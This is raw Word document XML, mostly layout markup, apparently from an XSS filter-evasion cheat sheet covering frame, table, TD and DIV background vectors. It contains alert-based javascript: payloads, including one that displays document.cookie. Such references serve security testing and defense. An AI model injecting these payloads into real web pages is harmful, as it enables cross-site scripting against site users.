                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="5107,422;21,422;18,422;0,401;0,398;0,261;21,240;5107,240;5128,261;5128,401;5110,422;5107,422" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 742" o:spid="_x0000_s1691" type="#_x0000_t202" style="position:absolute;left:1614;top:240;width:5128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ERO8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5d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mERO8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&lt;IFRAME</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="7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SRC=#</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="7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onmouseover="alert(document.cookie)"&gt;&lt;/IFRAME&gt;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rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>FRAME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ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>Frames</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>sorts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XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>problems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iframes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="9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0508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160020</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3202305" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="737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2305" cy="116205"/>
                          <a:chOff x="1614" y="252"/>
                          <a:chExt cx="5043" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="738" name="Freeform 740"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="252"/>
                            <a:ext cx="5043" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6636 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 5043"/>
                              <a:gd name="T2" fmla="+- 0 434 252"/>
                              <a:gd name="T3" fmla="*/ 434 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 5043"/>
                              <a:gd name="T6" fmla="+- 0 434 252"/>
                              <a:gd name="T7" fmla="*/ 434 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 5043"/>
                              <a:gd name="T10" fmla="+- 0 434 252"/>
                              <a:gd name="T11" fmla="*/ 434 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 5043"/>
                              <a:gd name="T14" fmla="+- 0 413 252"/>
                              <a:gd name="T15" fmla="*/ 413 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 5043"/>
                              <a:gd name="T18" fmla="+- 0 410 252"/>
                              <a:gd name="T19" fmla="*/ 410 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 5043"/>
                              <a:gd name="T22" fmla="+- 0 273 252"/>
                              <a:gd name="T23" fmla="*/ 273 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 5043"/>
                              <a:gd name="T26" fmla="+- 0 252 252"/>
                              <a:gd name="T27" fmla="*/ 252 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6636 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 5043"/>
                              <a:gd name="T30" fmla="+- 0 252 252"/>
                              <a:gd name="T31" fmla="*/ 252 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6657 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 5043"/>
                              <a:gd name="T34" fmla="+- 0 273 252"/>
                              <a:gd name="T35" fmla="*/ 273 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6657 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 5043"/>
                              <a:gd name="T38" fmla="+- 0 413 252"/>
                              <a:gd name="T39" fmla="*/ 413 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6639 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 5043"/>
                              <a:gd name="T42" fmla="+- 0 434 252"/>
                              <a:gd name="T43" fmla="*/ 434 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6636 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 5043"/>
                              <a:gd name="T46" fmla="+- 0 434 252"/>
                              <a:gd name="T47" fmla="*/ 43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043" h="183">
                                <a:moveTo>
                                  <a:pt x="5022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022" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5043" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5043" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5025" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="502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Text Box 739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2"/>
                            <a:ext cx="504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&lt;FRAMESET&gt;&lt;FRAME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2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SRC="javascript:alert('XSS');"&gt;&lt;/FRAMESET&gt;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8" o:spid="_x0000_s1692" style="position:absolute;margin-left:80.7pt;margin-top:12.6pt;width:252.15pt;height:9.15pt;z-index:-15611392;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,252" coordsize="5043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">
                <v:shape id="Freeform 740" o:spid="_x0000_s1693" style="position:absolute;left:1614;top:252;width:5043;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5043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jP28IA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+C/sfwhvspqkb6FabSuk25kGQ1eH50by1&#10;dc1LaTKN/705CB4/vt/ZOphenGh0nWUF81kCgri2uuNGwc/+c/oKwnlkjb1lUnAhB+v8YZJhqu2Z&#10;v+lU+UbEEHYpKmi9H1IpXd2SQTezA3Hkfu1o0Ec4NlKPeI7hppfPSbKQBjuODS0OVLZU/1X/RkFd&#10;ho9uXxbDPPj33fFQbL+Ob06pp8dQrEB4Cv4uvrk3WsHyJa6NZ+IRkP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SM/bwgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m5022,182l21,182r-3,l,161r,-3l,21,21,,5022,r21,21l5043,161r-18,21l5022,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="5022,434;21,434;18,434;0,413;0,410;0,273;21,252;5022,252;5043,273;5043,413;5025,434;5022,434" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 739" o:spid="_x0000_s1694" type="#_x0000_t202" style="position:absolute;left:1614;top:252;width:5043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wN8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXlCb7qxBaupq4goFAQxpoceX7PP&#10;ZDH7Ns1uNf57Vyh4HGbmG2a+7GwtLtR641jBeJSAIC6cNlwq+Mq3wykIH5A11o5JwY08LBf93hxT&#10;7a6c0eUYShEh7FNUUIXQpFL6oiKLfuQa4uidXGsxRNmWUrd4jXBby9ckmUiLhuNChQ2tKyrOxz+r&#10;YPXN2cb87n8O2SkzeT5LeDc5K/Uy6FYfIAJ14Rn+b39qBe9vM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w/A3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&lt;FRAMESET&gt;&lt;FRAME</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="12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SRC="javascript:alert('XSS');"&gt;&lt;/FRAMESET&gt;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rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>TABLE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="1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0560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153670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2399665" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="734" name="Group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9665" cy="116205"/>
                          <a:chOff x="1614" y="242"/>
                          <a:chExt cx="3779" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="735" name="Freeform 737"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="241"/>
                            <a:ext cx="3779" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5372 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3779"/>
                              <a:gd name="T2" fmla="+- 0 424 242"/>
                              <a:gd name="T3" fmla="*/ 424 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3779"/>
                              <a:gd name="T6" fmla="+- 0 424 242"/>
                              <a:gd name="T7" fmla="*/ 424 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3779"/>
                              <a:gd name="T10" fmla="+- 0 423 242"/>
                              <a:gd name="T11" fmla="*/ 423 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3779"/>
                              <a:gd name="T14" fmla="+- 0 403 242"/>
                              <a:gd name="T15" fmla="*/ 403 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3779"/>
                              <a:gd name="T18" fmla="+- 0 400 242"/>
                              <a:gd name="T19" fmla="*/ 400 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3779"/>
                              <a:gd name="T22" fmla="+- 0 263 242"/>
                              <a:gd name="T23" fmla="*/ 263 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3779"/>
                              <a:gd name="T26" fmla="+- 0 242 242"/>
                              <a:gd name="T27" fmla="*/ 242 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5372 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3779"/>
                              <a:gd name="T30" fmla="+- 0 242 242"/>
                              <a:gd name="T31" fmla="*/ 242 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5393 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3779"/>
                              <a:gd name="T34" fmla="+- 0 263 242"/>
                              <a:gd name="T35" fmla="*/ 263 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5393 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3779"/>
                              <a:gd name="T38" fmla="+- 0 403 242"/>
                              <a:gd name="T39" fmla="*/ 403 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5375 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3779"/>
                              <a:gd name="T42" fmla="+- 0 423 242"/>
                              <a:gd name="T43" fmla="*/ 423 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5372 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3779"/>
                              <a:gd name="T46" fmla="+- 0 424 242"/>
                              <a:gd name="T47" fmla="*/ 42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779" h="183">
                                <a:moveTo>
                                  <a:pt x="375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758" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3779" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3779" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3761" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="375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Text Box 73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1"/>
                            <a:ext cx="377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&lt;TABLE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BACKGROUND="javascript:alert('XSS')"&gt;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5" o:spid="_x0000_s1695" style="position:absolute;margin-left:80.7pt;margin-top:12.1pt;width:188.95pt;height:9.15pt;z-index:-15610880;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,242" coordsize="377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">
                <v:shape id="Freeform 737" o:spid="_x0000_s1696" style="position:absolute;left:1614;top:241;width:3779;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="377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F7q8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IK3uqmVqukrhIKFYUiaL14e2af&#10;SWj2bciuyfrv3ULB4zAz3zCLVTC16Kh1lWUFr6MEBHFudcWFguPP18schPPIGmvLpOBGDlbLp8EC&#10;U2173lN38IWIEHYpKii9b1IpXV6SQTeyDXH0LrY16KNsC6lb7CPc1HKcJO/SYMVxocSGPkvKfw9X&#10;o0CfbUc9h2mWnU7bi96NvydhrdTwOWQfIDwF/wj/tzdawextCn9n4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4XurxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m3758,182l21,182r-3,-1l,161r,-3l,21,21,,3758,r21,21l3779,161r-18,20l3758,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3758,424;21,424;18,423;0,403;0,400;0,263;21,242;3758,242;3779,263;3779,403;3761,423;3758,424" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 736" o:spid="_x0000_s1697" type="#_x0000_t202" style="position:absolute;left:1614;top:241;width:377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xkRcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXmF3nRTC6mNriLSQqFQTOKhx2f2&#10;mSxm38bsVtN/3xUKHoeZ+YZZrgfbigv13jhW8DRNQBBXThuuFezL98kchA/IGlvHpOCXPKxX49ES&#10;M+2unNOlCLWIEPYZKmhC6DIpfdWQRT91HXH0jq63GKLsa6l7vEa4beUsSVJp0XBcaLCjbUPVqfix&#10;CjbfnL+Z89dhlx9zU5avCX+mJ6UeH4bNAkSgIdzD/+0PreDlO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XGRF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&lt;TABLE</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="8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BACKGROUND="javascript:alert('XSS')"&gt;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Balk4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>TD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72"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Just</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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above,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>TD's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vulnerable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BACKGROUNDs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>containing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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vectors:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="9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0662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2615565" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="731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5565" cy="116205"/>
                          <a:chOff x="1614" y="240"/>
                          <a:chExt cx="4119" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="732" name="Freeform 734"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="240"/>
                            <a:ext cx="4119" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5712 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 4119"/>
                              <a:gd name="T2" fmla="+- 0 422 240"/>
                              <a:gd name="T3" fmla="*/ 422 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 4119"/>
                              <a:gd name="T6" fmla="+- 0 422 240"/>
                              <a:gd name="T7" fmla="*/ 422 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 4119"/>
                              <a:gd name="T10" fmla="+- 0 422 240"/>
                              <a:gd name="T11" fmla="*/ 422 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 4119"/>
                              <a:gd name="T14" fmla="+- 0 401 240"/>
                              <a:gd name="T15" fmla="*/ 401 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 4119"/>
                              <a:gd name="T18" fmla="+- 0 398 240"/>
                              <a:gd name="T19" fmla="*/ 398 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 4119"/>
                              <a:gd name="T22" fmla="+- 0 261 240"/>
                              <a:gd name="T23" fmla="*/ 261 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 4119"/>
                              <a:gd name="T26" fmla="+- 0 240 240"/>
                              <a:gd name="T27" fmla="*/ 240 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5712 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 4119"/>
                              <a:gd name="T30" fmla="+- 0 240 240"/>
                              <a:gd name="T31" fmla="*/ 240 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5733 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 4119"/>
                              <a:gd name="T34" fmla="+- 0 261 240"/>
                              <a:gd name="T35" fmla="*/ 261 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5733 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 4119"/>
                              <a:gd name="T38" fmla="+- 0 401 240"/>
                              <a:gd name="T39" fmla="*/ 401 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5715 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 4119"/>
                              <a:gd name="T42" fmla="+- 0 422 240"/>
                              <a:gd name="T43" fmla="*/ 422 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5712 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 4119"/>
                              <a:gd name="T46" fmla="+- 0 422 240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19" h="183">
                                <a:moveTo>
                                  <a:pt x="409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098" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4119" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4119" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4101" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="409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Text Box 73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0"/>
                            <a:ext cx="411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&lt;TABLE&gt;&lt;TD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9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BACKGROUND="javascript:alert('XSS')"&gt;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2" o:spid="_x0000_s1698" style="position:absolute;margin-left:80.7pt;margin-top:12pt;width:205.95pt;height:9.15pt;z-index:-15609856;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,240" coordsize="411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">
                <v:shape id="Freeform 734" o:spid="_x0000_s1699" style="position:absolute;left:1614;top:240;width:4119;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="411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RrQ8QA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXmF3nTTCI2NriKKtBcPJh7q7ZF9&#10;TUKzb8Puqum/7wqCx2FmvmGW68F04krOt5YVvE0TEMSV1S3XCk7lfjIH4QOyxs4yKfgjD+vVeLTE&#10;XNsbH+lahFpECPscFTQh9LmUvmrIoJ/anjh6P9YZDFG6WmqHtwg3nUyT5F0abDkuNNjTtqHqt7gY&#10;Bf58zNLUzz4K/s4c2rbUn4edUq8vw2YBItAQnuFH+0sryGYp3M/E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ka0PEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m4098,182l21,182r-3,l,161r,-3l,21,21,,4098,r21,21l4119,161r-18,21l4098,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4098,422;21,422;18,422;0,401;0,398;0,261;21,240;4098,240;4119,261;4119,401;4101,422;4098,422" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 733" o:spid="_x0000_s1700" type="#_x0000_t202" style="position:absolute;left:1614;top:240;width:411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vH3cUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3upGBbXRVUQsFARpTA89vmaf&#10;yWL2bcxuNf57tyB4HGbmG2ax6mwtLtR641jBcJCAIC6cNlwq+M4/3mYgfEDWWDsmBTfysFr2XhaY&#10;anfljC6HUIoIYZ+igiqEJpXSFxVZ9APXEEfv6FqLIcq2lLrFa4TbWo6SZCItGo4LFTa0qag4Hf6s&#10;gvUPZ1tz3v9+ZcfM5Pl7wrvJSanXfreegwjUhWf40f7UCqbj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K8fd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&lt;TABLE&gt;&lt;TD</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="9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BACKGROUND="javascript:alert('XSS')"&gt;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DIV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Balk4"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t>DIV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Background-image</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/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0713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160020</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3256280" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="728" name="Group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56280" cy="116205"/>
                          <a:chOff x="1614" y="252"/>
                          <a:chExt cx="5128" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="729" name="Freeform 731"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="252"/>
                            <a:ext cx="5128" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6721 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 5128"/>
                              <a:gd name="T2" fmla="+- 0 434 252"/>
                              <a:gd name="T3" fmla="*/ 434 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 5128"/>
                              <a:gd name="T6" fmla="+- 0 434 252"/>
                              <a:gd name="T7" fmla="*/ 434 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 5128"/>
                              <a:gd name="T10" fmla="+- 0 434 252"/>
                              <a:gd name="T11" fmla="*/ 434 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 5128"/>
                              <a:gd name="T14" fmla="+- 0 413 252"/>
                              <a:gd name="T15" fmla="*/ 413 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 5128"/>
                              <a:gd name="T18" fmla="+- 0 410 252"/>
                              <a:gd name="T19" fmla="*/ 410 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 5128"/>
                              <a:gd name="T22" fmla="+- 0 273 252"/>
                              <a:gd name="T23" fmla="*/ 273 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 5128"/>
                              <a:gd name="T26" fmla="+- 0 252 252"/>
                              <a:gd name="T27" fmla="*/ 252 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6721 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 5128"/>
                              <a:gd name="T30" fmla="+- 0 252 252"/>
                              <a:gd name="T31" fmla="*/ 252 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6742 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 5128"/>
                              <a:gd name="T34" fmla="+- 0 273 252"/>
                              <a:gd name="T35" fmla="*/ 273 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6742 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 5128"/>
                              <a:gd name="T38" fmla="+- 0 413 252"/>
                              <a:gd name="T39" fmla="*/ 413 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6724 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 5128"/>
                              <a:gd name="T42" fmla="+- 0 434 252"/>
                              <a:gd name="T43" fmla="*/ 434 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6721 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 5128"/>
                              <a:gd name="T46" fmla="+- 0 434 252"/>
                              <a:gd name="T47" fmla="*/ 43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128" h="183">
                                <a:moveTo>
                                  <a:pt x="5107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107" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5128" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5128" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5110" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="510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Text Box 730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2"/>
                            <a:ext cx="512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&lt;DIV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STYLE="background-image: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url(javascript:alert('XSS'))"&gt;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9" o:spid="_x0000_s1701" style="position:absolute;margin-left:80.7pt;margin-top:12.6pt;width:256.4pt;height:9.15pt;z-index:-15609344;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,252" coordsize="5128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">
                <v:shape id="Freeform 731" o:spid="_x0000_s1702" style="position:absolute;left:1614;top:252;width:5128;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="512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eZ78YA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KEXkQ3iraauopWFOnJRg8eH9nX&#10;JJh9G7LbGPvrXUHocZiZb5j5sjWlaKh2hWUFw0EEgji1uuBMwem47U9BOI+ssbRMCm7kYLnovMwx&#10;1vbK39QkPhMBwi5GBbn3VSylS3My6Aa2Ig7ej60N+iDrTOoarwFuSjmKojdpsOCwkGNFnzmll+TX&#10;KEiGf35z2GzbW1OcV72v3XhyWI+Veu22qw8Qnlr/H36291rB+2gGjzPhCM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ieZ78YAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m5107,182l21,182r-3,l,161r,-3l,21,21,,5107,r21,21l5128,161r-18,21l5107,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="5107,434;21,434;18,434;0,413;0,410;0,273;21,252;5107,252;5128,273;5128,413;5110,434;5107,434" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
